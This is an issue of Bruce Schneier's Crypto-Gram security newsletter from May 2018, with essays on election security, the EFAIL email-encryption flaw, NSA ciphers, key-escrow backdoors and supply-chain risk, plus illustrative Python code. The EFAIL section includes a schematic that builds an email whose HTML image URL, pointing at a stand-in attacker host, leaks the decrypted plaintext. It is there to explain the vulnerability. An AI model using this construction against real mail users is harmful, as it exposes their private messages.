Crypto-Gram

May 15, 2018

by Bruce Schneier
CTO, IBM Resilient
schneier@schneier.com
https://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit <https://www.schneier.com/crypto-gram.html>.

You can read this issue on the web at <https://www.schneier.com/crypto-gram/archives/2018/…>. These same essays and news items appear in the “Schneier on Security” blog at <https://www.schneier.com/>, along with a lively and intelligent comment section. An RSS feed is available.


In this issue:
      Securing Elections
      Details on a New PGP Vulnerability
      News
      Two NSA Algorithms Rejected by the ISO
      Ray Ozzie’s Encryption Backdoor
      Schneier News
      Supply-Chain Security

Securing Elections

Elections serve two purposes. The first, and obvious, purpose is to accurately choose the winner. But the second is equally important: to convince the loser. To the extent that an election system is not transparently and auditably accurate, it fails in that second purpose. Our election systems are failing, and we need to fix them.

Today, we conduct our elections on computers. Our registration lists are in computer databases. We vote on computerized voting machines. And our tabulation and reporting are done on computers. We do this for a lot of good reasons, but a side effect is that elections now have all the insecurities inherent in computers. The only way to reliably protect elections from both malice and accident is to use something that is not hackable or unreliable at scale; the best way to do that is to back up as much of the system as possible with paper.

There have been two graphic demonstrations of how bad our computerized voting system is. In 2007, the states of California and Ohio conducted audits of their electronic voting machines. Expert review teams found exploitable vulnerabilities in almost every component they examined. The researchers were able to undetectably alter vote tallies, erase audit logs, and load malware onto the systems. Some of their attacks could be implemented by a single individual with no greater access than a normal poll worker; others could be done remotely.

Last year, the Defcon hackers’ conference sponsored a Voting Village. Organizers collected 25 pieces of voting equipment, including voting machines and electronic poll books. By the end of the weekend, conference attendees had found ways to compromise every piece of test equipment: to load malicious software, compromise vote tallies and audit logs, or cause equipment to fail.

It’s important to understand that these were not well-funded nation-state attackers. These were not even academics who had been studying the problem for weeks. These were bored hackers, with no experience with voting machines, playing around between parties one weekend.

It shouldn’t be any surprise that voting equipment, including voting machines, voter registration databases, and vote tabulation systems, is that hackable. They’re computers—often ancient computers running operating systems no longer supported by the manufacturers—and they don’t have any magical security technology that the rest of the industry isn’t privy to. If anything, they’re less secure than the computers we generally use, because their manufacturers hide any flaws behind the proprietary nature of their equipment.

We’re not just worried about altering the vote. Sometimes causing widespread failures, or even just sowing mistrust in the system, is enough. And an election whose results are not trusted or believed is a failed election.

Voting systems have another requirement that makes security even harder to achieve: the requirement for a secret ballot. Because we have to securely separate the election-roll system that determines who can vote from the system that collects and tabulates the votes, we can’t use the security systems available to banking and other high-value applications.

We can securely bank online, but can’t securely vote online. If we could do away with anonymity—if everyone could check that their vote was counted correctly—then it would be easy to secure the vote. But that would lead to other problems. Before the US had the secret ballot, voter coercion and vote-buying were widespread.

We can’t do away with the secret ballot, so we need to accept that our voting systems are insecure. We need an election system that is resilient to the threats. And for many parts of the system, that means paper.

Let’s start with the voter rolls. We know they’ve already been targeted. In 2016, someone changed the party affiliation of hundreds of voters before the Republican primary. That’s just one possibility. A well-executed attack that deletes, for example, one in five voters at random—or changes their addresses—would cause chaos on election day.

Yes, we need to shore up the security of these systems. We need better computer, network, and database security for the various state voter organizations. We also need to better secure the voter registration websites, with better design and better internet security. We need better security for the companies that build and sell all this equipment.

Multiple, unchangeable backups are essential. A record of every addition, deletion, and change needs to be stored on a separate system, on write-once media like a DVD-R. Copies of that DVD, or—even better—a paper printout of the voter rolls, should be available at every polling place on election day. We need to be ready for anything.
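
One way to make such a change record tamper-evident is a hash chain, where every logged change commits to everything logged before it, so any later alteration of a burned copy is detectable. A minimal sketch in Python (my own illustration, not any state’s actual system):

    import hashlib
    import json
    import time

    class AppendOnlyLog:
        """Hash-chained log of voter-roll changes (illustrative only)."""

        def __init__(self):
            self.entries = []
            self.prev_hash = "0" * 64    # sentinel hash for the first entry

        def append(self, action, record):
            entry = {"time": time.time(), "action": action,
                     "record": record, "prev": self.prev_hash}
            digest = hashlib.sha256(
                json.dumps(entry, sort_keys=True).encode()).hexdigest()
            self.entries.append((entry, digest))
            self.prev_hash = digest      # the next entry commits to this one

        def verify(self):
            """Re-walk the chain; any edit to a burned copy breaks it."""
            prev = "0" * 64
            for entry, digest in self.entries:
                expected = hashlib.sha256(
                    json.dumps(entry, sort_keys=True).encode()).hexdigest()
                if entry["prev"] != prev or digest != expected:
                    return False
                prev = digest
            return True

    log = AppendOnlyLog()
    log.append("add", {"voter": "Jane Doe", "precinct": 12})
    log.append("change_address", {"voter": "Jane Doe", "precinct": 14})
    assert log.verify()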

Next, the voting machines themselves. Security researchers agree that the gold standard is a voter-verified paper ballot. The easiest (and cheapest) way to achieve this is through optical-scan voting. Voters mark paper ballots by hand; they are fed into a machine and counted automatically. That paper ballot is saved, and serves as a final true record in a recount in case of problems. Touch-screen machines that print a paper ballot to drop in a ballot box can also work for voters with disabilities, as long as the ballot can be easily read and verified by the voter.

Finally, the tabulation and reporting systems. Here again we need more security in the process, but we must always use those paper ballots as checks on the computers. A manual, post-election, risk-limiting audit varies the number of ballots examined according to the margin of victory. Conducting this audit after every election, before the results are certified, gives us confidence that the election outcome is correct, even if the voting machines and tabulation computers have been tampered with. Additionally, we need better coordination and communications when incidents occur.
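
To make the auditing idea concrete, here is a minimal sketch of a two-candidate ballot-polling audit in the style of Stark’s BRAVO method (my simplification; real audits handle multiple contests, invalid ballots, and escalation rules):

    import random

    def ballot_polling_audit(winner_share, ballots, risk_limit=0.05, seed=0):
        """Sample ballots until the reported outcome is confirmed.

        winner_share: the reported vote share of the winner (> 0.5).
        ballots: list of "W" (reported winner) / "L" (reported loser) votes.
        Returns the sample size needed, or None for a full hand count.
        """
        rng = random.Random(seed)
        t = 1.0                           # Wald sequential test statistic
        order = rng.sample(range(len(ballots)), len(ballots))
        for n, i in enumerate(order, 1):
            t *= (winner_share if ballots[i] == "W" else 1 - winner_share) / 0.5
            if t >= 1 / risk_limit:
                return n                  # outcome confirmed at this risk limit
        return None                       # too close; escalate to a hand count

    # A 60/40 race is confirmed after a few hundred ballots; as the
    # margin shrinks toward 51/49, the sample approaches a full count.
    votes = ["W"] * 6000 + ["L"] * 4000
    print(ballot_polling_audit(0.60, votes))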

It’s vital to agree on these procedures and policies before an election. Before the fact, when anyone can win and no one knows whose votes might be changed, it’s easy to agree on strong security. But after the vote, someone is the presumptive winner—and then everything changes. Half of the country wants the result to stand, and half wants it reversed. At that point, it’s too late to agree on anything.

The politicians running in the election shouldn’t have to argue their challenges in court. Getting elections right is in the interest of all citizens. Many countries have independent election commissions that are charged with conducting elections and ensuring their security. We don’t do that in the US.

Instead, we have representatives from each of our two parties in the room, keeping an eye on each other. That provided acceptable security against 20th-century threats, but is totally inadequate to secure our elections in the 21st century. And the belief that the diversity of voting systems in the US provides a measure of security is a dangerous myth, because a few districts can be decisive and there are so few voting-machine vendors.

We can do better. In 2017, the Department of Homeland Security declared elections to be critical infrastructure, allowing the department to focus on securing them. On 23 March, Congress allocated $380m to states to upgrade election security.

These are good starts, but don’t go nearly far enough. The Constitution delegates elections to the states but allows Congress to “make or alter such Regulations.” In 1845, Congress set a nationwide election day. Today, we need Congress to set uniform and strict election standards.

This essay originally appeared in the “Guardian.”
https://www.theguardian.com/commentisfree/2018/apr/…

2007 audits:
http://www.sos.ca.gov/elections/voting-systems/…
https://www.eac.gov/assets/1/28/everest.pdf

Defcon Voting Village:
https://www.defcon.org/images/defcon-25/…

Verified Voting on ancient voting machines:
https://www.verifiedvoting.org/resources/…

Verified Voting on online voting:
https://www.verifiedvoting.org/resources/…

Voting rolls targeted:
https://www.nbcnews.com/storyline/…

Instance of party affiliation being changed:
http://www.pe.com/articles/…

Belfer Center publication on election security:
https://www.belfercenter.org/sites/default/files/…

Security of voter registration websites:
https://gcn.com/articles/2018/03/28/…
https://techscience.org/a/2017090601/

Hacking voting machine vendors:
https://www.csoonline.com/article/3267625/security/…

Nicholas Weaver on unchangeable backup systems:
https://www.lawfareblog.com/…

The need for a voter-verified paper ballot:
https://votingmachines.procon.org/view.answers.php?…

The need for a risk-limiting audit:
https://www.stat.berkeley.edu/~stark/Preprints/…
https://www.verifiedvoting.org/resources/…

Coordination and communications for election officials:
https://www.belfercenter.org/sites/default/files/…

Excellent testimonies on election security:
http://www.crypto.com/papers/…
https://jhalderm.com/pub/misc/…
https://www.verifiedvoting.org/wp-content/uploads/…

Voting systems as critical infrastructure:
https://www.politico.com/story/2017/01/…

2018 budget allocation for election security:
https://www.reuters.com/article/…

Two final essays:
https://slate.com/news-and-politics/2018/02/…
https://www.washingtonpost.com/news/posteverything/…


Details on a New PGP Vulnerability

A new PGP vulnerability was announced yesterday. Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects: if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.
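
The direct-exfiltration variant is easy to see in miniature. Here is a schematic in Python of the message an attacker could construct (the boundary string and URL are hypothetical; this shows the shape of the attack, not a byte-accurate copy of the paper’s exploit):

    # The attacker sandwiches a captured ciphertext between two HTML
    # parts. A vulnerable client decrypts the middle part, concatenates
    # all three into one HTML document, and the plaintext lands inside
    # the image URL, so rendering the message sends it to the attacker.
    boundary = "BOUNDARY"
    captured = "...previously captured PGP or S/MIME ciphertext..."

    message = "\r\n".join([
        'Content-Type: multipart/mixed; boundary="' + boundary + '"',
        "",
        "--" + boundary,
        "Content-Type: text/html",
        "",
        '<img src="http://attacker.example/',   # quote deliberately left open
        "--" + boundary,
        "Content-Type: multipart/encrypted",    # the victim's encrypted part
        "",
        captured,
        "--" + boundary,
        "Content-Type: text/html",
        "",
        '">',                                   # closes the URL and the tag
        "--" + boundary + "--",
    ])
    print(message)

The paper’s CBC/CFB “gadget” attacks achieve the same exfiltration by modifying the ciphertext itself, but the principle is identical: decrypted plaintext is smuggled into a URL that the client then fetches.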

A few initial comments:

1. Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, but is hard for the average hacker. That being said, there are circumstances where someone can modify e-mails. I don’t mean to minimize the seriousness of this attack, but that is a consideration.

2. The vulnerability isn’t with PGP or S/MIME itself, but in the way they interact with modern e-mail programs. You can see this in the two suggested short-term mitigations: “No decryption in the e-mail client,” and “disable HTML rendering.”

3. I’ve been getting some weird press calls from reporters wanting to know if this demonstrates that e-mail encryption is impossible. No, this just demonstrates that programmers are human and vulnerabilities are inevitable. PGP almost certainly has fewer bugs than your average piece of software, but it’s not bug free.

4. Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with this announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.

https://efail.de/

https://motherboard.vice.com/en_us/article/3k4nd9/…
https://it.slashdot.org/story/18/05/14/149222/…


News

The Center for Democracy and Technology has a good summary of the current state of the DMCA’s chilling effects on security research.
https://cdt.org/blog/…
Note: I am a signatory on the letter supporting unrestricted security research.
https://cdt.org/insight/…

Turns out it’s easy to hijack emergency sirens with a radio transmitter.
https://gizmodo.com/…

An interesting idea: oblivious DNS.
https://odns.cs.princeton.edu/
https://www.techrepublic.com/article/…

Police in the UK were able to read a fingerprint from a photo of a hand:
http://www.bbc.com/news/uk-wales-43711477?…

This acoustic technology identifies individuals by their ear shapes. No information about either false positives or false negatives.
https://www.nec.com/en/press/201802/…

Russia has banned the secure messaging app Telegram. It’s making an absolute mess of the ban—blocking 16 million IP addresses, many belonging to the Amazon and Google clouds—and it’s not even clear that it’s working. But, more importantly, I’m not convinced Telegram is secure in the first place.
https://www.tomshardware.com/news/…
https://www.techdirt.com/articles/20180417/…
https://www.theverge.com/2018/4/17/17246150/…
https://gizmodo.com/…
Such a weird story. If you want secure messaging, use Signal. If you’re concerned that having Signal on your phone will itself arouse suspicion, use WhatsApp.

“Do Not Disturb” is a Macintosh app that sends an alert when the lid is opened. The idea is to detect computer tampering.
https://objective-see.com/products/dnd.html
https://www.wired.com/story/…

Info on the coded signals used by the Colorado Rockies baseball team.
https://www.fangraphs.com/s/…

Lt. Gen. Paul Nakasone has been confirmed as the new head of the NSA and US Cyber Command. I know nothing about him.
https://www.politico.com/story/2018/04/24/…
https://www.politico.com/story/2018/02/13/…

This seems like an epic security failure for TSB Bank:
https://www.schneier.com/blog/archives/2018/04/…
https://www.nakedcapitalism.com/2018/04/…

Researchers have disclosed a massive vulnerability in the VingCard electronic lock system, used in hotel rooms around the world. Patching is a nightmare. It requires updating the firmware on every lock individually.
https://www.zdnet.com/article/…
https://www.wired.com/story/…
https://it.slashdot.org/story/18/04/25/1451253/…

Researchers at Princeton University have released IoT Inspector, a tool that analyzes the security and privacy of IoT devices by examining the data they send across the Internet. They’ve already used the tool to study a bunch of different IoT devices. Their first two findings are “Many IoT devices lack basic encryption and authentication” and “User behavior can be inferred from encrypted IoT device traffic.” No surprises there.
https://freedom-to-tinker.com/2018/04/23/…
https://iot-inspector.princeton.edu/
https://boingboing.net/2018/04/23/promiscuous-mode.html

IoT Hall of Shame:
https://codecurmudgeon.com/wp/iot-hall-shame/

NIST issues a call for “lightweight cryptography algorithms”:
https://www.nist.gov/news-events/news/2018/04/…

LC4: another pen-and-paper symmetric cipher.
https://eprint.iacr.org/2017/339
https://news.ycombinator.com/item?id=16586257
Almost two decades ago, I designed Solitaire, a pen-and-paper cipher that uses a deck of playing cards to store the cipher’s state. LC4 instead uses a set of specialized tiles. This gives the cipher designer more options, but it can be incriminating in a way that regular playing cards are not. Still, I like seeing more designs like this.
https://www.schneier.com/academic/solitaire/

Micah Lee ran a two-year experiment designed to detect whether or not his laptop was ever tampered with. The results are inconclusive, but demonstrate how difficult it can be to detect laptop tampering.
https://theintercept.com/2018/04/28/…

This survey and report concludes that the US is unprepared for election-related hacking in 2018:
https://shorensteincenter.org/…
Security is never something we actually want. Security is something we need in order to avoid what we don’t want. It’s also more abstract, concerned with hypothetical future possibilities. Of course it’s lower on the priorities list than fundraising and press coverage. They’re more tangible, and they’re more immediate.

This article says that the Virginia Beach police are looking to buy encrypted radios. Someone should ask them if they want those radios to have a backdoor.
https://apnews.com/1a35310fb6aa440a81fe8ae3da5afbed

New research: “Leaving on a jet plane: the trade in fraudulently obtained airline tickets”:
https://link.springer.com/article/10.1007/…
https://www.lightbluetouchpaper.org/2018/05/09/…


Two NSA Algorithms Rejected by the ISO

The ISO has rejected two symmetric encryption algorithms: SIMON and SPECK. These algorithms were both designed by the NSA and made public in 2013. They are optimized for small and low-cost processors of the kind found in IoT devices.
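
The designs are public and strikingly simple, which is what makes them attractive for constrained hardware. Here is a sketch of Speck64/128 based on my reading of the 2013 specification (an illustration, not a vetted implementation):

    MASK = 0xFFFFFFFF                 # 32-bit words (Speck64/128)
    ALPHA, BETA, ROUNDS = 8, 3, 27    # rotation amounts and round count

    def rotl(x, r): return ((x << r) | (x >> (32 - r))) & MASK
    def rotr(x, r): return ((x >> r) | (x << (32 - r))) & MASK

    def key_schedule(k0, l0, l1, l2):
        """Expand a 128-bit key (four 32-bit words) into 27 round keys."""
        k, l = [k0], [l0, l1, l2]
        for i in range(ROUNDS - 1):
            l.append(((k[i] + rotr(l[i], ALPHA)) & MASK) ^ i)
            k.append(rotl(k[i], BETA) ^ l[-1])
        return k

    def encrypt(x, y, round_keys):
        for rk in round_keys:         # one add, two rotates, two XORs
            x = ((rotr(x, ALPHA) + y) & MASK) ^ rk
            y = rotl(y, BETA) ^ x
        return x, y

    def decrypt(x, y, round_keys):
        for rk in reversed(round_keys):
            y = rotr(x ^ y, BETA)
            x = rotl(((x ^ rk) - y) & MASK, ALPHA)
        return x, y

    rks = key_schedule(0x03020100, 0x0B0A0908, 0x13121110, 0x1B1A1918)
    ct = encrypt(0x3B726574, 0x7475432D, rks)
    assert decrypt(*ct, rks) == (0x3B726574, 0x7475432D)

Each round is nothing but one modular addition, two rotations, and two XORs; that economy is the whole point of these designs.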

The risk of using NSA-designed ciphers, of course, is that they might include NSA-designed backdoors. Personally, I doubt that they’re backdoored. And I always like seeing NSA-designed cryptography (particularly its key schedules). It’s like examining alien technology.

https://www.wikitribune.com/story/2018/04/20/…
https://twitter.com/TomerAshur/status/…

SIMON and SPECK:
https://eprint.iacr.org/2013/404.pdf
https://www.schneier.com/blog/archives/2013/07/…


Ray Ozzie’s Encryption Backdoor

Last month, Wired published a long article about Ray Ozzie and his supposed new scheme for adding a backdoor in encrypted devices. It’s a weird article. It paints Ozzie’s proposal as something that “attains the impossible” and “satisfies both law enforcement and privacy purists,” when (1) it’s barely a proposal, and (2) it’s essentially the same key escrow scheme we’ve been hearing about for decades.

Basically, each device has a unique public/private key pair and a secure processor. The public key is embedded in the device, and is used to encrypt whatever user key encrypts the data. The private key is stored in a secure database, available to law enforcement on demand. The only other trick is that for law enforcement to use that key, they have to put the device in some sort of irreversible recovery mode, which means it can never be used again. That’s basically it.
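
Stripped of the gloss, the cryptographic core is ordinary key wrapping. A minimal sketch of that step using Python’s “cryptography” package (names and parameters are my own illustration; the proposal doesn’t specify them):

    import os
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import rsa, padding

    # At manufacture: the vendor generates the device's escrow key pair
    # and keeps the private half in its law-enforcement-access database.
    escrow_private = rsa.generate_private_key(public_exponent=65537,
                                              key_size=3072)
    escrow_public = escrow_private.public_key()   # burned into the device

    # On the device: the user key that encrypts the data is wrapped
    # with the escrow public key and stored next to the encrypted data.
    user_key = os.urandom(32)                     # e.g., an AES-256 key
    oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                        algorithm=hashes.SHA256(), label=None)
    wrapped_key = escrow_public.encrypt(user_key, oaep)

    # With a warrant, and the device in irreversible recovery mode, the
    # vendor unwraps the user key using its copy of the private key.
    recovered = escrow_private.decrypt(wrapped_key, oaep)
    assert recovered == user_key

The hard part, as the next paragraph argues, is everything around this code: protecting the database that holds escrow_private and policing its use.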

I have no idea why anyone is talking as if this were anything new. Several cryptographers have already explained why this key escrow scheme is no better than any other key escrow scheme. The short answer is (1) we won’t be able to secure that database of backdoor keys, (2) we don’t know how to build the secure coprocessor the scheme requires, and (3) it solves none of the policy problems around the whole system. This is the typical mistake non-cryptographers make when they approach this problem: they think that the hard part is the cryptography to create the backdoor. That’s actually the easy part. The hard part is ensuring that it’s only used by the good guys, and there’s nothing in Ozzie’s proposal that addresses any of that.

I worry that this kind of thing is damaging in the long run. There should be some rule that any backdoor or key escrow proposal be a fully specified proposal, not just some cryptography and hand-waving notions about how it will be used in practice. And before it is analyzed and debated, it should have to satisfy some sort of basic security analysis. Otherwise, we’ll be swatting pseudo-proposals like this one, while those on the other side of this debate become increasingly convinced that it’s possible to design one of these things securely.

Already people are using the National Academies report on backdoors for law enforcement as evidence that engineers are developing workable and secure backdoors. Writing in Lawfare, Alan Z. Rozenshtein claimed that the report—and a related “New York Times” story—“undermine the argument that secure third-party access systems are so implausible that it’s not even worth trying to develop them.” Susan Landau effectively corrected this misconception, but the damage is done.

Here’s the thing: it’s not hard to design and build a backdoor. What’s hard is building the systems—both technical and procedural—around them. Here’s Rob Graham:

He’s only solving the part we already know how to solve. He’s deliberately ignoring the stuff we don’t know how to solve. We know how to make backdoors, we just don’t know how to secure them.

A bunch of us cryptographers have already explained why we don’t think this sort of thing will work in the foreseeable future. In “Keys Under Doormats,” we write:

Exceptional access would force Internet system developers to reverse “forward secrecy” design practices that seek to minimize the impact on user privacy when systems are breached. The complexity of today’s Internet environment, with millions of apps and globally connected services, means that new law enforcement requirements are likely to introduce unanticipated, hard to detect security flaws. Beyond these and other technical vulnerabilities, the prospect of globally deployed exceptional access systems raises difficult problems about how such an environment would be governed and how to ensure that such systems would respect human rights and the rule of law.

Finally, Matthew Green:

The reason so few of us are willing to bet on massive-scale key escrow systems is that *we’ve thought about it and we don’t think it will work*. We’ve looked at the threat model, the usage model, and the quality of hardware and software that exists today. Our informed opinion is that there’s no detection system for key theft, there’s no renewability system, HSMs are terrifically vulnerable (and the companies largely staffed with ex-intelligence employees), and insiders can be suborned. We’re not going to put the data of a few billion people on the line in an environment where we *believe with high probability* that the system will fail.

Article on Ozzie’s scheme:
https://www.wired.com/story/…

Reactions to it:
https://blog.cryptographyengineering.com/2018/04/26/…
https://blog.erratasec.com/2018/04/…
https://www.cs.columbia.edu/~smb/blog/2018-04/…
https://cyberlaw.stanford.edu/blog/2018/04/…
https://www.zdnet.com/article/…

Justice Department is again pushing backdoors:
https://www.nytimes.com/2018/03/24/us/politics/…

National Academies report:
https://www.nap.edu/catalog/25010/…

Rozenshtein post:
https://www.lawfareblog.com/…

Related “New York Times” story:
https://www.nytimes.com/2018/03/24/us/politics/…

Landau correction:
https://www.lawfareblog.com/…

“Keys Under Doormats” paper:
https://www.schneier.com/academic/paperfiles/…

An analysis of the proposal:
https://mice.cs.columbia.edu/getTechreport.php?…
https://arstechnica.com/information-technology/2018/…


Schneier News

I am speaking on several panels at RightsCon in Toronto on 5/16-18.
https://www.rightscon.org/toronto/

I am speaking at the Paranoia conference in Oslo on 5/29.
https://paranoia.watchcom.no/

I am speaking at CyCon X in Tallinn on 5/31.
https://ccdcoe.org/cycon/frontpage.html


Supply-Chain Security

Earlier this month, the Pentagon stopped selling phones made by the Chinese companies ZTE and Huawei on military bases because they might be used to spy on their users.

It’s a legitimate fear, and perhaps a prudent action. But it’s just one instance of the much larger issue of securing our supply chains.

All of our computerized systems are deeply international, and we have no choice but to trust the companies and governments that touch those systems. And while we can ban a few specific products, services or companies, no country can isolate itself from potential foreign interference.

In this specific case, the Pentagon is concerned that the Chinese government demanded that ZTE and Huawei add “backdoors” to their phones that could be surreptitiously turned on by government spies or cause them to fail during some future political conflict. This tampering is possible because the software in these phones is incredibly complex. It’s relatively easy for programmers to hide these capabilities, and correspondingly difficult to detect them.

This isn’t the first time the United States has taken action against foreign software suspected to contain hidden features that can be used against us. Last December, President Trump signed into law a bill banning software from the Russian company Kaspersky from being used within the US government. In 2012, the focus was on Chinese-made Internet routers. Then, the House Intelligence Committee concluded: “Based on available classified and unclassified information, Huawei and ZTE cannot be trusted to be free of foreign state influence and thus pose a security threat to the United States and to our systems.”

Nor is the United States the only country worried about these threats. In 2014, China reportedly banned antivirus products from both Kaspersky and the US company Symantec, based on similar fears. In 2017, the Indian government identified 42 smartphone apps that China subverted. Back in 1997, the Israeli company Check Point was dogged by rumors that its government added backdoors into its products; other tech companies from that country have been suspected of the same thing. Even al-Qaeda was concerned; ten years ago, a sympathizer released the encryption software Mujahedeen Secrets, claiming it was free of Western influence and backdoors. If a country doesn’t trust another country, then it can’t trust that country’s computer products.

But this trust isn’t limited to the country where the company is based. We have to trust the country where the software is written—and the countries where all the components are manufactured. In 2016, researchers discovered that many different models of cheap Android phones were sending information back to China. The phones might be American-made, but the software was from China. In 2016, researchers demonstrated an even more devious technique, where a backdoor could be added at the computer chip level in the factory that made the chips—without the knowledge of, and undetectable by, the engineers who designed the chips in the first place. Pretty much every US technology company manufactures its hardware in countries such as Malaysia, Indonesia, China and Taiwan.

We also have to trust the programmers. Today’s large software programs are written by teams of hundreds of programmers scattered around the globe. Backdoors, put there by we-have-no-idea-who, have been discovered in Juniper firewalls (a US company) and D-Link routers (a Taiwanese one). In 2003, someone almost slipped a very clever backdoor into Linux. Think of how many countries’ citizens are writing software for Apple or Microsoft or Google.

We can go even farther down the rabbit hole. We have to trust the distribution systems for our hardware and software. Documents disclosed by Edward Snowden showed the National Security Agency installing backdoors into Cisco routers being shipped to the Syrian telephone company. There are fake apps in the Google Play store that eavesdrop on you. Russian hackers subverted the update mechanism of a popular brand of Ukrainian accounting software to spread the NotPetya malware.

In 2017, researchers demonstrated that a smartphone can be subverted by installing a malicious replacement screen.

I could go on. Supply-chain security is an incredibly complex problem. US-only design and manufacturing isn’t an option; the tech world is far too internationally interdependent for that. We can’t trust anyone, yet we have no choice but to trust everyone. Our phones, computers, software and cloud systems are touched by citizens of dozens of different countries, any one of whom could subvert them at the demand of their government. And just as Russia is penetrating the US power grid so that it has that capability in the event of hostilities, many countries are almost certainly doing the same thing at the consumer level.

We don’t know whether the risk of Huawei and ZTE equipment is great enough to warrant the ban. We don’t know what classified intelligence the United States has, and what it implies. But we do know that this is just a minor fix for a much larger problem. It’s doubtful that this ban will have any real effect. Members of the military, and everyone else, can still buy the phones. They just can’t buy them on US military bases. And while the US might block the occasional merger or acquisition, or ban the occasional hardware or software product, we’re largely ignoring that larger issue. Solving it borders on somewhere between incredibly expensive and realistically impossible.

Perhaps someday, global norms and international treaties will render this sort of device-level tampering off-limits. But until then, all we can do is hope that this particular arms race doesn’t get too far out of control.

This essay previously appeared in the “Washington Post.”
https://www.washingtonpost.com/news/posteverything/…

US military stops selling ZTE phones:
https://www.washingtonpost.com/news/the-switch/wp/…

Kaspersky ban:
https://www.reuters.com/article/…

2012 House Intelligence Committee report:
https://intelligence.house.gov/sites/…

China’s ban:
https://www.zdnet.com/article/…

India’s report:
https://www.indiatimes.com/technology/news/…

Rumors about Check Point:
http://old.greatcircle.com/firewalls/mhonarc/…

Mujahedeen Secrets:
https://www.schneier.com/blog/archives/2008/02/…

2016 Android backdoor:
https://www.nytimes.com/2016/11/16/us/politics/…

2016 chip-level backdoor:
https://www.wired.com/2016/06/…

Backdoor in Juniper firewalls:
https://www.wired.com/2015/12/…

Backdoor in D-Link routers:
http://www.infoworld.com/article/2612384/…

Linux almost backdoor:
https://freedom-to-tinker.com/2013/10/09/…

Fake apps in the Google Play store:
http://abcnews.go.com/US/…

Russian subversion of an update mechanism:
https://www.wired.com/story/…

Adding a smartphone backdoor via a malicious replacement screen:
https://arstechnica.com/information-technology/2017/…

Russian hackers penetrating the US power grid:
https://www.nytimes.com/2018/03/15/us/politics/…


Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise. You can subscribe, unsubscribe, or change your address on the Web at <https://www.schneier.com/crypto-gram.html>. Back issues are also available at that URL.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Bruce Schneier is an internationally renowned security technologist, called a “security guru” by The Economist. He is the author of 12 books—including “Liars and Outliers: Enabling the Trust Society Needs to Survive”—as well as hundreds of articles, essays, and academic papers. His influential newsletter “Crypto-Gram” and his blog “Schneier on Security” are read by over 250,000 people. He has testified before Congress, is a frequent guest on television and radio, has served on several government committees, and is regularly quoted in the press. Schneier is a fellow at the Berkman Klein Center for Internet and Society at Harvard University, a program fellow at the New America Foundation’s Open Technology Institute, a board member of the Electronic Frontier Foundation, an Advisory Board Member of the Electronic Privacy Information Center, and CTO of IBM Resilient and Special Advisor to IBM Security. See <https://www.schneier.com>.

Crypto-Gram is a personal newsletter. Opinions expressed are not necessarily those of IBM Resilient.

Copyright (c) 2018 by Bruce Schneier.

Sidebar photo of Bruce Schneier by Joe MacInnis.